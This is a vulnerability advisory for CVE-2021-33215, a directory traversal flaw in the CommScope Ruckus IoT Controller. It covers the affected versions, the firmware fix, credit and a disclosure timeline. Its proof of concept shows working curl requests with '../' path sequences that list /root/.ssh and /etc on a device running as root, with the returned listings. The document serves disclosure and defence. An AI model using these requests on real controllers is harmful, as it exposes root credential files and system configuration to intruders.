CommScope Ruckus IoT Controller Web Application Directory Traversal

Vulnerability Details

Affected Vendor: CommScope
Affected Product: Ruckus IoT Controller
Affected Version: 1.7.1.0 and earlier
Platform: Linux
CWE Classification: CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’), CWE-250: Execution with Unnecessary Privileges
CVE ID: CVE-2021-33215

Vulnerability Description

A Python script (web.py) for a Dockerized webservice contains
a directory traversal vulnerability, which can be leveraged by
an authenticated attacker to view the contents of directories
on the IoT Controller.

Technical Description

The CommScope Ruckus IoT Controller features a directory
traversal vulnerability that allows an authenticated attacker
to explore the IoT Controller’s file system. The vulnerable
Python script is /VRIOT/ops/docker/webservice/web.py.

With the web application running as root, this allows for all
directories to be explored.

An authentication token is required. But a token is easily
obtained due to hard-coded, default, unchangeable web application
credentials (CVE-2021-33219).

Mitigation and Remediation Recommendation

The vendor has released an updated firmware (1.8.0.0) which
remediates the described vulnerability. Firmware and release
notes are available at:

https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf

Credit

This vulnerability was discovered by Jim Becher (@jimbecher)
of KoreLogic, Inc.

Disclosure Timeline

2021.03.30 - KoreLogic submits vulnerability details to
CommScope.
2021.03.30 - CommScope acknowledges receipt and the intention
to investigate.
2021.04.06 - CommScope notifies KoreLogic that this issue,
along with several others reported by KoreLogic,
will require more than the standard 45 business
day remediation timeline.
2021.04.06 - KoreLogic agrees to extend disclosure embargo if
necessary.
2021.04.30 - CommScope informs KoreLogic that remediation for
this vulnerability will be available inside of the
standard 45 business day timeline. Requests
KoreLogic acquire CVE number for this
vulnerability.
2021.05.14 - 30 business days have elapsed since the
vulnerability was reported to CommScope.
2021.05.17 - CommScope notifies KoreLogic that the patched
version of the firmware will be available the week
of 2021.05.24.
2021.05.19 - KoreLogic requests CVE from MITRE.
2021.05.19 - MITRE issues CVE-2021-33215.
2021.05.25 - CommScope releases firmware 1.8.0.0 and associated
advisory.
2021.05.26 - KoreLogic public disclosure.

Proof of Concept

$ curl -k -H “Authorization: Token [valid token]” ‘https://192.168.2.220/service/v1/node-red/static?path=/../../../../../../../../root/.ssh/’

{u’base_path’: u’/VRIOT/node-red/static/…/…/…/…/…/…/…/…/root/.ssh/‘,
u’message’: u’List’,
u’response’: [{u’is_dir’: False,
u’is_file’: True,
u’is_symlink’: False,
u’name’: u’known_hosts’,
u’path’: u’/VRIOT/node-red/static/…/…/…/…/…/…/…/…/root/.ssh/known_hosts’,
u’showpath’: u’https://192.168.2.220/node-static/../../../../../../../../root/.ssh/known_hosts’,
u’st_atime’: 1582707570.3173862,
u’st_ctime’: 1582707550.1438398,
u’st_dev’: 2049,
u’st_gid’: 0,
u’st_ino’: 132199,
u’st_mode’: 33188,
u’st_mtime’: 1582707550.1438398,
u’st_nlink’: 1,
u’st_size’: 963,
u’st_uid’: 0}],
u’static_path’: u’/VRIOT/node-red/static’}

The above output is a pretty-printed version of the JSON response returned.

$ curl -k -H “Authorization: Token [valid token]” ‘https://192.168.2.220/service/v1/node-red/static?path=/../../../../../../../../etc/’
{u’base_path’: u’/VRIOT/node-red/static/…/…/…/…/…/…/…/…/etc/‘,
u’message’: u’List’,
u’response’: [{u’is_dir’: True,
u’is_file’: False,
u’is_symlink’: False,
u’name’: u’python3’,
u’path’: u’/VRIOT/node-red/static/…/…/…/…/…/…/…/…/etc/python3’,
u’showpath’: u’/…/…/…/…/…/…/…/…/etc/python3’,
u’st_atime’: 1610463245.7594006,
u’st_ctime’: 1493664067.5699568,
u’st_dev’: 2049,
u’st_gid’: 0,
u’st_ino’: 262743,
u’st_mode’: 16877,
u’st_mtime’: 1493664067.5699568,
u’st_nlink’: 2,
u’st_size’: 4096,
u’st_uid’: 0},
{u’is_dir’: True,
u’is_file’: False,
u’is_symlink’: False,
u’name’: u’ldap’,
u’path’: u’/VRIOT/node-red/static/…/…/…/…/…/…/…/…/etc/ldap’,
u’showpath’: u’/…/…/…/…/…/…/…/…/etc/ldap’,
u’st_atime’: 1610463245.7594006,
u’st_ctime’: 1527803641.495955,
u’st_dev’: 2049,
u’st_gid’: 0,
u’st_ino’: 304157,
u’st_mode’: 16877,
u’st_mtime’: 1527803641.495955,
u’st_nlink’: 2,
u’st_size’: 4096,
u’st_uid’: 0},
{u’is_dir’: False,
u’is_file’: True,
u’is_symlink’: False,
u’name’: u’rsyslog.conf’,
u’path’: u’/VRIOT/node-red/static/…/…/…/…/…/…/…/…/etc/rsyslog.conf’,
u’showpath’: u’https://192.168.2.220/node-static/../../../../../../../../etc/rsyslog.conf’,
u’st_atime’: 1609718505.600734,
u’st_ctime’: 1493664067.573957,
u’st_dev’: 2049,
u’st_gid’: 0,
u’st_ino’: 262833,
u’st_mode’: 33188,
u’st_mtime’: 1453934568.0,
u’st_nlink’: 1,
u’st_size’: 1371,
u’st_uid’: 0},
{u’is_dir’: True,
u’is_file’: False,
u’is_symlink’: False,
u’name’: u’pacemaker’,
u’path’: u’/VRIOT/node-red/static/…/…/…/…/…/…/…/…/etc/pacemaker’,
u’showpath’: u’/…/…/…/…/…/…/…/…/etc/pacemaker’,
u’st_atime’: 1610463245.7674005,
u’st_ctime’: 1550175549.2084513,
u’st_dev’: 2049,
u’st_gid’: 0,
u’st_ino’: 267639,
u’st_mode’: 16877,
u’st_mtime’: 1550175549.2084513,
u’st_nlink’: 2,
u’st_size’: 4096,
u’st_uid’: 0},
…
…

The above output is a pretty-printed version of the JSON response returned.